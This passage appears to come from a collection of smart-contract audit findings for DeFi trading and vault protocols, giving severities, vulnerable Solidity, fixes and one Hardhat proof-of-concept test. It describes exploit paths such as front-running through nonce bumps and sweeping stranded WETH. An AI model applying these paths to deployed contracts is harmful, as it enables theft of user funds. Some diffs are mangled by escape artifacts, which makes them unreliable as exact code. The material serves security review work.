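        if open_amount - filled_amount < MIN_QUOTE_VALUE:
            return False  # revert: "LibQuote: Remaining quote value is low"
    return True

# requestToClosePosition(99): check enforced, call reverts (remaining 1 < 5)
print(close_allowed(100, 99, 99))   # False
# requestToClosePosition(100) then fillCloseRequest(99): check skipped,
# leaving a dust position of size 1
print(close_allowed(100, 100, 99))  # True
```

With the recommended condition (`filled_amount != quantity_to_close`) the second call would also be rejected, closing the gap.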
The condition should be to ignore the `minAcceptableQuoteValue` if request is filled in full (filledAmount == quantityToClose):\\n```\\n- if (LibQuote.quoteOpenAmount(quote) != quote.quantityToClose) {\\n+ if (filledAmount != quote.quantityToClose) {\\n require(quote.lockedValues.total() >= symbolLayout.symbols[quote.symbolId].minAcceptableQuoteValue,\\n "LibQuote: Remaining quote value is low");\\n }\\n```\\n
There can be multiple reasons why the protocol enforces `minAcceptableQuoteValue`, one of them might be the efficiency of the liquidation mechanism: when quote value is too small (and liquidation value too small too), liquidators will not have enough incentive to liquidate these positions in case they become insolvent. Both partyA and partyB might also not have enough incentive to close or respond to request to close such small positions, possibly resulting in a loss of funds and greater market risk for either user.\\nProof of Concept\\nAdd this to any test, for example to `ClosePosition.behavior.ts`.\\n```\\nit("Close position with remainder below minAcceptableQuoteValue", async function () {\\n const context: RunContext = this.context;\\n\\n this.user_allocated = decimal(1000);\\n this.hedger_allocated = decimal(1000);\\n\\n this.user = new User(this.context, this.context.signers.user);\\n await this.user.setup();\\n await this.user.setBalances(this.user_allocated, this.user_allocated, this.user_allocated);\\n\\n this.hedger = new Hedger(this.context, this.context.signers.hedger);\\n await this.hedger.setup();\\n await this.hedger.setBalances(this.hedger_allocated, this.hedger_allocated);\\n\\n await this.user.sendQuote(limitQuoteRequestBuilder()\\n .quantity(decimal(100))\\n .price(decimal(1))\\n .cva(decimal(10)).lf(decimal(5)).mm(decimal(15))\\n .build()\\n );\\n await this.hedger.lockQuote(1, 0, decimal(5, 17));\\n await this.hedger.openPosition(1, limitOpenRequestBuilder().filledAmount(decimal(100)).openPrice(decimal(1)).price(decimal(1)).build());\\n\\n // now try to close full position (100)\\n await this.user.requestToClosePosition(\\n 1,\\n limitCloseRequestBuilder().quantityToClose(decimal(100)).closePrice(decimal(1)).build(),\\n );\\n\\n // now partyA cancels request\\n //await this.user.requestToCancelCloseRequest(1);\\n\\n // partyB can fill 99\\n await this.hedger.fillCloseRequest(\\n 1,\\n limitFillCloseRequestBuilder()\\n 
.filledAmount(decimal(99))\\n .closedPrice(decimal(1))\\n .build(),\\n );\\n\\n var q = await context.viewFacet.getQuote(1);\\n console.log("quote quantity: " + q.quantity.div(decimal(1)) + " closed: " + q.closedAmount.div(decimal(1)));\\n\\n});\\n```\\n\\nConsole execution result:\\n```\\nquote quantity: 100 closed: 99\\n```\\n
```\\nif (LibQuote.quoteOpenAmount(quote) != quote.quantityToClose) {\\n require(quote.lockedValues.total() >= symbolLayout.symbols[quote.symbolId].minAcceptableQuoteValue,\\n "LibQuote: Remaining quote value is low");\\n}\\n```\\n
MultiAccount `depositAndAllocateForAccount` function doesn't scale the allocated amount correctly, failing to allocate enough funds
medium
Internal accounting (allocatedBalances) are tracked as fixed numbers with 18 decimals, while collateral tokens can have different amount of decimals. This is correctly accounted for in AccountFacet.depositAndAllocate:\\n```\\n AccountFacetImpl.deposit(msg.sender, amount);\\n uint256 amountWith18Decimals = (amount * 1e18) /\\n (10 ** IERC20Metadata(GlobalAppStorage.layout().collateral).decimals());\\n AccountFacetImpl.allocate(amountWith18Decimals);\\n```\\n\\nBut it is treated incorrectly in MultiAccount.depositAndAllocateForAccount:\\n```\\n ISymmio(symmioAddress).depositFor(account, amount);\\n bytes memory _callData = abi.encodeWithSignature(\\n "allocate(uint256)",\\n amount\\n );\\n innerCall(account, _callData);\\n```\\n\\nThis leads to incorrect allocated amounts.
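The scaling difference can be quantified with a short sketch. This is illustrative Python mirroring the `amount * 1e18 / 10 ** decimals()` conversion; using a 6-decimal collateral (e.g. USDC) is an assumption for the example:

```python
def to_18_decimals(amount, collateral_decimals):
    # mirrors AccountFacet.depositAndAllocate's scaling step
    return amount * 10**18 // 10**collateral_decimals

raw = 100 * 10**6  # 100 tokens of a 6-decimal collateral
print(to_18_decimals(raw, 6) == 100 * 10**18)  # True: correct allocation
# MultiAccount passes `raw` straight through, allocating 100e6 instead of
# 100e18 -- only a 1e-12 fraction of the intended amount
print(raw / to_18_decimals(raw, 6))  # 1e-12
```

So for a 6-decimal collateral the unscaled call under-allocates by a factor of 10^12, leaving only dust allocated.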
Scale amount correctly before allocating it:\\n```\\n ISymmio(symmioAddress).depositFor(account, amount);\\n+ uint256 amountWith18Decimals = (amount * 1e18) /\\n+ (10 ** IERC20Metadata(collateral).decimals());\\n bytes memory _callData = abi.encodeWithSignature(\\n "allocate(uint256)",\\n- amount\\n+ amountWith18Decimals\\n );\\n innerCall(account, _callData);\\n```\\n
Similar to 222 from previous audit contest, the user expects to have full amount deposited and allocated, but ends up with only dust amount allocated, which can lead to unexpected liquidations (for example, user is at the edge of liquidation, calls depositAndAllocate to improve account health, but is liquidated instead). For consistency reasons, since this is almost identical to 222, it should also be high.
```\\n AccountFacetImpl.deposit(msg.sender, amount);\\n uint256 amountWith18Decimals = (amount * 1e18) /\\n (10 ** IERC20Metadata(GlobalAppStorage.layout().collateral).decimals());\\n AccountFacetImpl.allocate(amountWith18Decimals);\\n```\\n
PartyBFacetImpl.chargeFundingRate should check whether quoteIds is an empty array to prevent partyANonces from being increased, causing some operations of partyA to fail
medium
```\\nFile: symmio-core\\contracts\\facets\\PartyB\\PartyBFacetImpl.sol\\n function chargeFundingRate(\\n address partyA,\\n uint256[] memory quoteIds,\\n int256[] memory rates,\\n PairUpnlSig memory upnlSig\\n ) internal {\\n LibMuon.verifyPairUpnl(upnlSig, msg.sender, partyA);\\n require(quoteIds.length == rates.length, "PartyBFacet: Length not match");\\n int256 partyBAvailableBalance = LibAccount.partyBAvailableBalanceForLiquidation(\\n upnlSig.upnlPartyB,\\n msg.sender,\\n partyA\\n );\\n int256 partyAAvailableBalance = LibAccount.partyAAvailableBalanceForLiquidation(\\n upnlSig.upnlPartyA,\\n partyA\\n );\\n uint256 epochDuration;\\n uint256 windowTime;\\n for (uint256 i = 0; i < quoteIds.length; i++) {\\n// rest of code// rest of code//quoteIds is empty array, so code is never executed.\\n }\\n require(partyAAvailableBalance >= 0, "PartyBFacet: PartyA will be insolvent");\\n require(partyBAvailableBalance >= 0, "PartyBFacet: PartyB will be insolvent");\\n AccountStorage.layout().partyBNonces[msg.sender][partyA] += 1;\\n394:-> AccountStorage.layout().partyANonces[partyA] += 1;\\n }\\n```\\n\\nAs long as partyBAvailableBalance(L318) and partyAAvailableBalance(L323) are greater than or equal to 0, that is to say, PartyA and PartyB are solvent. 
Then, partyB can add 1 to `partyANonces[partyA]` at little cost (just the gas of the transaction).\\n```\\nFile: symmio-core\\contracts\\facets\\PartyA\\PartyAFacetImpl.sol\\n function forceClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n Quote storage quote = QuoteStorage.layout().quotes[quoteId];\\n// rest of code// rest of code//assume codes here are executed\\n273:-> LibMuon.verifyPairUpnlAndPrice(upnlSig, quote.partyB, quote.partyA, quote.symbolId);\\n// rest of code// rest of code\\n }\\n```\\n\\nIf the current price goes against partyB, then partyB can front-run `forceClosePosition` and call `chargeFundingRate` to increase the nonces of both parties by 1. In this way, partyA's `forceClosePosition` will inevitably revert because the nonces are incorrect.
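A simplified model of the flow (illustrative Python, not the actual Solidity) shows that an empty `quoteIds` array sails through every check while still bumping both nonces:

```python
def charge_funding_rate(quote_ids, rates, party_a_solvent, party_b_solvent, nonces):
    # with an empty quoteIds array the length check passes, the loop body
    # never executes, the solvency requires pass, and both nonces are bumped
    assert len(quote_ids) == len(rates)
    for quote_id, rate in zip(quote_ids, rates):
        pass  # funding-rate accounting; never reached for ([], [])
    assert party_a_solvent and party_b_solvent
    nonces["partyB"] += 1
    nonces["partyA"] += 1  # invalidates partyA's pending Muon signatures
    return nonces

print(charge_funding_rate([], [], True, True, {"partyA": 0, "partyB": 0}))
# {'partyA': 1, 'partyB': 1}
```

Requiring `quote_ids` to be non-empty, as the recommendation suggests, removes this zero-cost nonce bump.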
```\\nFile: symmio-core\\contracts\\facets\\PartyB\\PartyBFacetImpl.sol\\n function chargeFundingRate(\\n address partyA,\\n uint256[] memory quoteIds,\\n int256[] memory rates,\\n PairUpnlSig memory upnlSig\\n ) internal {\\n LibMuon.verifyPairUpnl(upnlSig, msg.sender, partyA);\\n317:- require(quoteIds.length == rates.length, "PartyBFacet: Length not match");\\n317:+ require(quoteIds.length > 0 && quoteIds.length == rates.length, "PartyBFacet: Length is 0 or Length not match");\\n```\\n
Due to this issue, partyB can increase the nonces of any partyA at little cost, causing some operations of partyA to fail (refer to the Vulnerability Detail section). This opens up the opportunity for partyB to turn the tables.
```\\nFile: symmio-core\\contracts\\facets\\PartyB\\PartyBFacetImpl.sol\\n function chargeFundingRate(\\n address partyA,\\n uint256[] memory quoteIds,\\n int256[] memory rates,\\n PairUpnlSig memory upnlSig\\n ) internal {\\n LibMuon.verifyPairUpnl(upnlSig, msg.sender, partyA);\\n require(quoteIds.length == rates.length, "PartyBFacet: Length not match");\\n int256 partyBAvailableBalance = LibAccount.partyBAvailableBalanceForLiquidation(\\n upnlSig.upnlPartyB,\\n msg.sender,\\n partyA\\n );\\n int256 partyAAvailableBalance = LibAccount.partyAAvailableBalanceForLiquidation(\\n upnlSig.upnlPartyA,\\n partyA\\n );\\n uint256 epochDuration;\\n uint256 windowTime;\\n for (uint256 i = 0; i < quoteIds.length; i++) {\\n// rest of code// rest of code//quoteIds is empty array, so code is never executed.\\n }\\n require(partyAAvailableBalance >= 0, "PartyBFacet: PartyA will be insolvent");\\n require(partyBAvailableBalance >= 0, "PartyBFacet: PartyB will be insolvent");\\n AccountStorage.layout().partyBNonces[msg.sender][partyA] += 1;\\n394:-> AccountStorage.layout().partyANonces[partyA] += 1;\\n }\\n```\\n
Stat calculator returns incorrect report for swETH
high
The purpose of the in-scope `SwEthEthOracle` contract is to act as a price oracle specifically for swETH (Swell ETH) per the comment in the contract below and the codebase's README\\n```\\nFile: SwEthEthOracle.sol\\n/**\\n * @notice Price oracle specifically for swEth (Swell Eth).\\n * @dev getPriceEth is not a view fn to support reentrancy checks. Does not actually change state.\\n */\\ncontract SwEthEthOracle is SystemComponent, IPriceOracle {\\n```\\n\\nPer the codebase in the contest repository, the price oracle for the swETH is understood to be configured to the `SwEthEthOracle` contract at Line 252 below.\\n```\\nFile: RootOracleIntegrationTest.t.sol\\n swEthOracle = new SwEthEthOracle(systemRegistry, IswETH(SWETH_MAINNET));\\n..SNIP..\\n // Lst special pricing case setup\\n // priceOracle.registerMapping(SFRXETH_MAINNET, IPriceOracle(address(sfrxEthOracle)));\\n priceOracle.registerMapping(WSTETH_MAINNET, IPriceOracle(address(wstEthOracle)));\\n priceOracle.registerMapping(SWETH_MAINNET, IPriceOracle(address(swEthOracle)));\\n```\\n\\nThus, in the context of this audit, the price oracle for the swETH is mapped to the `SwEthEthOracle` contract.\\nBoth the swETH oracle and calculator use the same built-in `swEth.swETHToETHRate` function to retrieve the price of swETH in ETH.\\n| LST | Oracle | Calculator | Rebasing |\\n| --- | --- | --- | --- |\\n| swETH | SwEthEthOracle - `swEth.swETHToETHRate()` | SwethLSTCalculator - `IswETH(lstTokenAddress).swETHToETHRate()` | False |\\n```\\nFile: SwEthEthOracle.sol\\n /// @inheritdoc IPriceOracle\\n function getPriceInEth(address token) external view returns (uint256 price) {\\n..SNIP..\\n // Returns in 1e18 precision.\\n price = swEth.swETHToETHRate();\\n }\\n```\\n\\n```\\nFile: SwethLSTCalculator.sol\\n function calculateEthPerToken() public view override returns (uint256) {\\n return IswETH(lstTokenAddress).swETHToETHRate();\\n }\\n```\\n\\nWithin the `LSTCalculatorBase.current` function, assume that the `swEth.swETHToETHRate` function returns $x$ when called. 
In this case, the `price` at Line 203 below and `backing` in Line 210 below will be set to $x$ since the `getPriceInEth` and `calculateEthPerToken` functions depend on the same `swEth.swETHToETHRate` function internally. Thus, `priceToBacking` will always be 1e18:\\n$$ \\begin{align} priceToBacking &= \\frac{price \\times 1e18}{backing} \\ &= \\frac{x \\times 1e18}{x} \\ &= 1e18 \\end{align} $$\\nSince `priceToBacking` is always 1e18, the `premium` will always be zero:\\n$$ \\begin{align} premium &= priceToBacking - 1e18 \\ &= 1e18 - 1e18 \\ &= 0 \\end{align} $$\\nAs a result, the calculator will always produce a wrong statistics report for swETH. If there is a premium or discount, the calculator will wrongly report none.\\n```\\nFile: LSTCalculatorBase.sol\\n function current() external returns (LSTStatsData memory) {\\n..SNIP..\\n IRootPriceOracle pricer = systemRegistry.rootPriceOracle();\\n uint256 price = pricer.getPriceInEth(lstTokenAddress);\\n..SNIP..\\n uint256 backing = calculateEthPerToken();\\n // price is always 1e18 and backing is in eth, which is 1e18\\n priceToBacking = price * 1e18 / backing;\\n }\\n\\n // positive value is a premium; negative value is a discount\\n int256 premium = int256(priceToBacking) - 1e18;\\n\\n return LSTStatsData({\\n lastSnapshotTimestamp: lastSnapshotTimestamp,\\n baseApr: baseApr,\\n premium: premium,\\n slashingCosts: slashingCosts,\\n slashingTimestamps: slashingTimestamps\\n });\\n }\\n```\\n
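The arithmetic can be checked with a short sketch. This is illustrative Python mirroring the `priceToBacking`/`premium` computation; the example rate values are assumptions, not on-chain data:

```python
def premium_1e18(price, backing):
    # mirrors LSTCalculatorBase.current:
    # priceToBacking = price * 1e18 / backing; premium = priceToBacking - 1e18
    price_to_backing = price * 10**18 // backing
    return price_to_backing - 10**18

rate = 1_030_000_000_000_000_000  # assumed swETHToETHRate() value
# oracle price and backing come from the same call, so premium is always 0
print(premium_1e18(rate, rate))  # 0
# with an independent market price, a real discount would show as negative
print(premium_1e18(1_020_000_000_000_000_000, rate) < 0)  # True
```

This makes explicit why a genuine discount is invisible: the premium can only be non-zero if the price input is sourced independently of `swETHToETHRate`.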
When handling the swETH within the `LSTCalculatorBase.current` function, consider other methods of obtaining the fair market price of swETH that do not rely on the `swEth.swETHToETHRate` function, such as an external third-party price oracle.
The purpose of the stats/calculators contracts is to store, augment, and clean data relevant to the LMPs. When the solver proposes a rebalance, the strategy uses the stats contracts to calculate a composite return (score) for the proposed destinations. Using that composite return, it determines if the swap is beneficial for the vault.\\nIf a stat calculator provides inaccurate information, it can have multiple implications that lead to losses for the protocol, such as false signals allowing an unprofitable rebalance to be executed.
```\\nFile: SwEthEthOracle.sol\\n/**\\n * @notice Price oracle specifically for swEth (Swell Eth).\\n * @dev getPriceEth is not a view fn to support reentrancy checks. Does not actually change state.\\n */\\ncontract SwEthEthOracle is SystemComponent, IPriceOracle {\\n```\\n
Incorrect approach to tracking the PnL of a DV
high
Let $DV_A$ be a certain destination vault.\\nAssume that at $T0$, the current debt value (currentDvDebtValue) of $DV_A$ is 95 WETH, and the last debt value (updatedDebtBasis) is 100 WETH. Since the current debt value has become smaller than the last debt value, the vault is making a loss of 5 WETH since the last rebalancing, so $DV_A$ is sitting at a loss, and users can only burn a limited amount of DestinationVault_A's shares.\\nAssume that at $T1$, there is some slight rebalancing performed on $DV_A$, and a few additional LP tokens are deposited to it. Thus, its current debt value increased to 98 WETH. At the same time, the `destInfo.debtBasis` and `destInfo.ownedShares` will be updated to the current value.\\nImmediately after the rebalancing, $DV_A$ will not be considered sitting in a loss since the `currentDvDebtValue` and `updatedDebtBasis` should be equal now. As a result, users could now burn all the $DV_A$ shares of the LMPVault during withdrawal.\\n$DV_A$ suddenly becomes not sitting at a loss even though the fact is that it is still sitting at a loss of 5 WETH. The loss has been written off.\\n```\\nFile: LMPDebt.sol\\n // Neither of these numbers include rewards from the DV\\n if (currentDvDebtValue < updatedDebtBasis) {\\n // We are currently sitting at a loss. Limit the value we can pull from\\n // the destination vault\\n currentDvDebtValue = currentDvDebtValue.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n currentDvShares = currentDvShares.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n }\\n```\\n
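The write-off in the timeline above reduces to the single comparison quoted from LMPDebt. A minimal sketch of the example numbers (illustrative Python, not the vault's actual accounting):

```python
def sitting_at_loss(current_dv_debt_value, updated_debt_basis):
    # mirrors the check in LMPDebt: `currentDvDebtValue < updatedDebtBasis`
    return current_dv_debt_value < updated_debt_basis

# T0: 95 WETH of current value against a 100 WETH debt basis
print(sitting_at_loss(95, 100))  # True -> withdrawals from DV_A are limited

# T1: a small rebalance adds 3 WETH of LP value and snaps the basis
# to the current value, so the 5 WETH loss is silently written off
print(sitting_at_loss(98, 98))   # False -> full shares can be burned
```

Because the basis resets on every rebalance, any deposit (however small) erases the accumulated loss from the comparison.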
Consider a more sophisticated approach to track a DV's Profit and Loss (PnL).\\nIn our example, $DV_A$ should only be considered not making a loss if the price of the LP tokens starts to appreciate and cover the loss of 5 WETH.
A DV might be incorrectly marked as not sitting in a loss, thus allowing users to burn all the DV shares, locking in all the loss of the DV and the vault shareholders.
```\\nFile: LMPDebt.sol\\n // Neither of these numbers include rewards from the DV\\n if (currentDvDebtValue < updatedDebtBasis) {\\n // We are currently sitting at a loss. Limit the value we can pull from\\n // the destination vault\\n currentDvDebtValue = currentDvDebtValue.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n currentDvShares = currentDvShares.mulDiv(userShares, totalVaultShares, Math.Rounding.Down);\\n }\\n```\\n
Price returned by Oracle is not verified
medium
As per the example provided by Tellor on how to integrate the Tellor oracle into the system, it has shown the need to check that the price returned by the oracle is not zero.\\n```\\nfunction getTellorCurrentValue(bytes32 _queryId)\\n ..SNIP..\\n // retrieve most recent 20+ minute old value for a queryId. the time buffer allows time for a bad value to be disputed\\n (, bytes memory data, uint256 timestamp) = tellor.getDataBefore(_queryId, block.timestamp - 20 minutes);\\n uint256 _value = abi.decode(data, (uint256));\\n if (timestamp == 0 || _value == 0) return (false, _value, timestamp);\\n```\\n\\nThus, the value returned from the `getDataBefore` function should be verified to ensure that the price returned by the oracle is not zero. However, this was not implemented.\\n```\\nFile: TellorOracle.sol\\n function getPriceInEth(address tokenToPrice) external returns (uint256) {\\n TellorInfo memory tellorInfo = _getQueryInfo(tokenToPrice);\\n uint256 timestamp = block.timestamp;\\n // Giving time for Tellor network to dispute price\\n (bytes memory value, uint256 timestampRetrieved) = getDataBefore(tellorInfo.queryId, timestamp - 30 minutes);\\n uint256 tellorStoredTimeout = uint256(tellorInfo.pricingTimeout);\\n uint256 tokenPricingTimeout = tellorStoredTimeout == 0 ? DEFAULT_PRICING_TIMEOUT : tellorStoredTimeout;\\n\\n // Check that something was returned and freshness of price.\\n if (timestampRetrieved == 0 || timestamp - timestampRetrieved > tokenPricingTimeout) {\\n revert InvalidDataReturned();\\n }\\n\\n uint256 price = abi.decode(value, (uint256));\\n return _denominationPricing(tellorInfo.denomination, price, tokenToPrice);\\n }\\n```\\n
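A small Python sketch of the validation path (illustrative only; the names mirror the Solidity but this is not the real oracle) shows how a fresh-but-zero price sails through the existing checks:

```python
DEFAULT_PRICING_TIMEOUT = 30 * 60  # seconds; illustrative value

def get_price_in_eth(value, timestamp_retrieved, now,
                     pricing_timeout=DEFAULT_PRICING_TIMEOUT):
    # Mirrors the check in TellorOracle.getPriceInEth:
    # note there is no `value == 0` guard, only staleness checks
    if timestamp_retrieved == 0 or now - timestamp_retrieved > pricing_timeout:
        raise ValueError("InvalidDataReturned")
    return value

# A zero price with a fresh timestamp passes validation and is returned as-is
assert get_price_in_eth(value=0, timestamp_retrieved=1_000, now=1_100) == 0
```

Adding `value == 0` to the revert condition, as the recommendation suggests, would make this call raise instead.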
Update the affected function as follows.\\n```\\nfunction getPriceInEth(address tokenToPrice) external returns (uint256) {\\n TellorInfo memory tellorInfo = _getQueryInfo(tokenToPrice);\\n uint256 timestamp = block.timestamp;\\n // Giving time for Tellor network to dispute price\\n (bytes memory value, uint256 timestampRetrieved) = getDataBefore(tellorInfo.queryId, timestamp // Remove the line below\\n 30 minutes);\\n uint256 tellorStoredTimeout = uint256(tellorInfo.pricingTimeout);\\n uint256 tokenPricingTimeout = tellorStoredTimeout == 0 ? DEFAULT_PRICING_TIMEOUT : tellorStoredTimeout;\\n\\n // Check that something was returned and freshness of price.\\n// Remove the line below\\n if (timestampRetrieved == 0 || timestamp // Remove the line below\\n timestampRetrieved > tokenPricingTimeout) {\\n// Add the line below\\n if (timestampRetrieved == 0 || value == 0 || timestamp // Remove the line below\\n timestampRetrieved > tokenPricingTimeout) {\\n revert InvalidDataReturned();\\n }\\n\\n uint256 price = abi.decode(value, (uint256));\\n return _denominationPricing(tellorInfo.denomination, price, tokenToPrice);\\n}\\n```\\n
The protocol relies on the oracle to provide accurate pricing for many critical operations, such as determining the debt values of DV, calculators/stats used during the rebalancing process, NAV/shares of the LMPVault, and determining how much assets the users should receive during withdrawal.\\nIf an incorrect value of zero is returned from Tellor, affected assets within the protocol will be considered worthless.
```\\nfunction getTellorCurrentValue(bytes32 _queryId)\\n ..SNIP..\\n // retrieve most recent 20+ minute old value for a queryId. the time buffer allows time for a bad value to be disputed\\n (, bytes memory data, uint256 timestamp) = tellor.getDataBefore(_queryId, block.timestamp - 20 minutes);\\n uint256 _value = abi.decode(data, (uint256));\\n if (timestamp == 0 || _value == 0) return (false, _value, timestamp);\\n```\\n
ETH deposited by the user may be stolen.
high
In the `deposit` function, if the user pays with ETH, it will first call `_processEthIn` to wrap it and then call `pullToken` to transfer.\\n```\\n /// @inheritdoc ILMPVaultRouterBase\\n function deposit(\\n ILMPVault vault,\\n address to,\\n uint256 amount,\\n uint256 minSharesOut\\n ) public payable virtual override returns (uint256 sharesOut) {\\n // handle possible eth\\n _processEthIn(vault);\\n\\n IERC20 vaultAsset = IERC20(vault.asset());\\n pullToken(vaultAsset, amount, address(this));\\n\\n return _deposit(vault, to, amount, minSharesOut);\\n }\\n```\\n\\n`_processEthIn` will wrap ETH into WETH, and this WETH belongs to the contract itself.\\n```\\n function _processEthIn(ILMPVault vault) internal {\\n // if any eth sent, wrap it first\\n if (msg.value > 0) {\\n // if asset is not weth, revert\\n if (address(vault.asset()) != address(weth9)) {\\n revert InvalidAsset();\\n }\\n\\n // wrap eth\\n weth9.deposit{ value: msg.value }();\\n }\\n }\\n```\\n\\nHowever, `pullToken` transfers from `msg.sender` and does not use the WETH obtained in `_processEthIn`.\\n```\\n function pullToken(IERC20 token, uint256 amount, address recipient) public payable {\\n token.safeTransferFrom(msg.sender, recipient, amount);\\n }\\n```\\n\\nIf the user sends 10 ETH and has also approved 10 WETH to the contract, then with an `amount` of 10, a total of 20 WETH ends up in the contract: 10 wrapped from the sent ETH and 10 pulled from the user.\\nHowever, because `amount` is 10, only 10 WETH will be deposited into the vault, and the remaining 10 WETH can be stolen by an attacker using `sweepToken`.\\n```\\n function sweepToken(IERC20 token, uint256 amountMinimum, address recipient) public payable {\\n uint256 balanceToken = token.balanceOf(address(this));\\n if (balanceToken < amountMinimum) revert InsufficientToken();\\n\\n if (balanceToken > 0) {\\n token.safeTransfer(recipient, balanceToken);\\n }\\n }\\n```\\n\\nBoth `mint` and `deposit` in `LMPVaultRouterBase` have this problem.
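The double debit can be traced with a toy Python model of the router's token flows (an illustrative analogy, not the real contract; `DepositModel` and its fields are hypothetical names):

```python
class DepositModel:
    """Toy model of LMPVaultRouterBase.deposit token flows."""
    def __init__(self, user_weth):
        self.router_weth = 0        # WETH sitting on the router contract
        self.user_weth = user_weth  # user's WETH balance, approved to the router
        self.vault_assets = 0

    def deposit(self, amount, msg_value):
        # _processEthIn: wraps msg.value ETH into WETH owned by the router
        self.router_weth += msg_value
        # pullToken: pulls `amount` WETH from msg.sender, ignoring the wrapped ETH
        self.user_weth -= amount
        self.router_weth += amount
        # _deposit: only `amount` is forwarded to the vault
        self.router_weth -= amount
        self.vault_assets += amount

m = DepositModel(user_weth=10)
m.deposit(amount=10, msg_value=10)  # user sends 10 ETH AND is debited 10 WETH
assert m.vault_assets == 10         # only 10 reaches the vault...
assert m.router_weth == 10          # ...10 WETH stranded, sweepable via sweepToken
assert m.user_weth == 0
```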
Perform operations based on the size of `msg.value` and amount:\\nmsg.value == amount: transfer WETH from contract not `msg.sender`\\nmsg.value > amount: transfer WETH from contract not `msg.sender` and refund to `msg.sender`\\nmsg.value < amount: transfer WETH from contract and transfer remaining from `msg.sender`
ETH deposited by the user may be stolen.
```\\n /// @inheritdoc ILMPVaultRouterBase\\n function deposit(\\n ILMPVault vault,\\n address to,\\n uint256 amount,\\n uint256 minSharesOut\\n ) public payable virtual override returns (uint256 sharesOut) {\\n // handle possible eth\\n _processEthIn(vault);\\n\\n IERC20 vaultAsset = IERC20(vault.asset());\\n pullToken(vaultAsset, amount, address(this));\\n\\n return _deposit(vault, to, amount, minSharesOut);\\n }\\n```\\n
Destination Vault rewards are not added to idleIncrease when info.totalAssetsPulled > info.totalAssetsToPull
high
In the `_withdraw` function, Destination Vault rewards are first recorded in `info.idleIncrease` by `info.idleIncrease += _baseAsset.balanceOf(address(this)) - assetPreBal - assetPulled;`.\\nBut when `info.totalAssetsPulled > info.totalAssetsToPull`, `info.idleIncrease` is directly assigned `info.totalAssetsPulled - info.totalAssetsToPull`, and `info.totalAssetsPulled` only counts `assetPulled`, without the Destination Vault rewards.\\n```\\n uint256 assetPreBal = _baseAsset.balanceOf(address(this));\\n uint256 assetPulled = destVault.withdrawBaseAsset(sharesToBurn, address(this));\\n\\n // Destination Vault rewards will be transferred to us as part of burning out shares\\n // Back into what that amount is and make sure it gets into idle\\n info.idleIncrease += _baseAsset.balanceOf(address(this)) - assetPreBal - assetPulled;\\n info.totalAssetsPulled += assetPulled;\\n info.debtDecrease += totalDebtBurn;\\n\\n // It's possible we'll get back more assets than we anticipate from a swap\\n // so if we do, throw it in idle and stop processing. You don't get more than we've calculated\\n if (info.totalAssetsPulled > info.totalAssetsToPull) {\\n info.idleIncrease = info.totalAssetsPulled - info.totalAssetsToPull;\\n info.totalAssetsPulled = info.totalAssetsToPull;\\n break;\\n }\\n```\\n\\nFor example,\\n```\\n // preBal == 100 pulled == 10 reward == 5 toPull == 6\\n // idleIncrease = 115 - 100 - 10 == 5\\n // totalPulled(0) += assetPulled == 10 > toPull\\n // idleIncrease = totalPulled - toPull == 4 < reward\\n```\\n\\nThe final `info.idleIncrease` does not record the reward, and these assets are not ultimately recorded by the Vault.
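The numeric example above can be replayed in a minimal Python sketch of the accounting (illustrative only; `settle` is a hypothetical helper mirroring the branch in `_withdraw`, with a `fixed` flag showing the `+=` correction):

```python
def settle(pre_bal, pulled, reward, to_pull, fixed=False):
    """Model one destination's settlement in LMPVault._withdraw."""
    post_bal = pre_bal + pulled + reward       # rewards arrive alongside the pull
    idle_increase = post_bal - pre_bal - pulled  # records the DV reward
    total_pulled = pulled
    if total_pulled > to_pull:
        surplus = total_pulled - to_pull
        # bug: plain `=` overwrites the reward already in idle_increase
        idle_increase = idle_increase + surplus if fixed else surplus
        total_pulled = to_pull
    return idle_increase

# Example from the report: preBal=100, pulled=10, reward=5, toPull=6
assert settle(100, 10, 5, 6) == 4              # 5 of reward lost, only surplus kept
assert settle(100, 10, 5, 6, fixed=True) == 9  # `+=` keeps reward (5) + surplus (4)
```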
`info.idleIncrease = info.totalAssetsPulled - info.totalAssetsToPull;` -> `info.idleIncrease += info.totalAssetsPulled - info.totalAssetsToPull;`
The final `info.idleIncrease` does not record the reward, and these assets are not ultimately recorded by the Vault.\\nMeanwhile, due to the `recover` function's inability to extract the `baseAsset`, this will result in no operations being able to handle these Destination Vault rewards, ultimately causing these assets to be frozen within the contract.
```\\n uint256 assetPreBal = _baseAsset.balanceOf(address(this));\\n uint256 assetPulled = destVault.withdrawBaseAsset(sharesToBurn, address(this));\\n\\n // Destination Vault rewards will be transferred to us as part of burning out shares\\n // Back into what that amount is and make sure it gets into idle\\n info.idleIncrease += _baseAsset.balanceOf(address(this)) - assetPreBal - assetPulled;\\n info.totalAssetsPulled += assetPulled;\\n info.debtDecrease += totalDebtBurn;\\n\\n // It's possible we'll get back more assets than we anticipate from a swap\\n // so if we do, throw it in idle and stop processing. You don't get more than we've calculated\\n if (info.totalAssetsPulled > info.totalAssetsToPull) {\\n info.idleIncrease = info.totalAssetsPulled - info.totalAssetsToPull;\\n info.totalAssetsPulled = info.totalAssetsToPull;\\n break;\\n }\\n```\\n
Liquidations miss delegate call to swapper
high
The LiquidationRow contract is an orchestrator for the claiming process. It is primarily used to collect rewards for vaults. It has a method called liquidateVaultsForToken. Based on docs this method is for: Conducts the liquidation process for a specific token across a list of vaults, performing the necessary balance adjustments, initiating the swap process via the asyncSwapper, taking a fee from the received amount, and queues the remaining swapped tokens in the MainRewarder associated with each vault.\\n```\\nfunction liquidateVaultsForToken(\\n address fromToken,\\n address asyncSwapper,\\n IDestinationVault[] memory vaultsToLiquidate,\\n SwapParams memory params\\n) external nonReentrant hasRole(Roles.LIQUIDATOR_ROLE) onlyWhitelistedSwapper(asyncSwapper) {\\n uint256 gasBefore = gasleft();\\n\\n (uint256 totalBalanceToLiquidate, uint256[] memory vaultsBalances) =\\n _prepareForLiquidation(fromToken, vaultsToLiquidate);\\n _performLiquidation(\\n gasBefore, fromToken, asyncSwapper, vaultsToLiquidate, params, totalBalanceToLiquidate, vaultsBalances\\n );\\n}\\n```\\n\\nThe second part of the function is performing the liquidation by calling _performLiquidation. A problem is at the beginning of it. IAsyncSwapper is called to swap tokens.\\n```\\nfunction _performLiquidation(\\n uint256 gasBefore,\\n address fromToken,\\n address 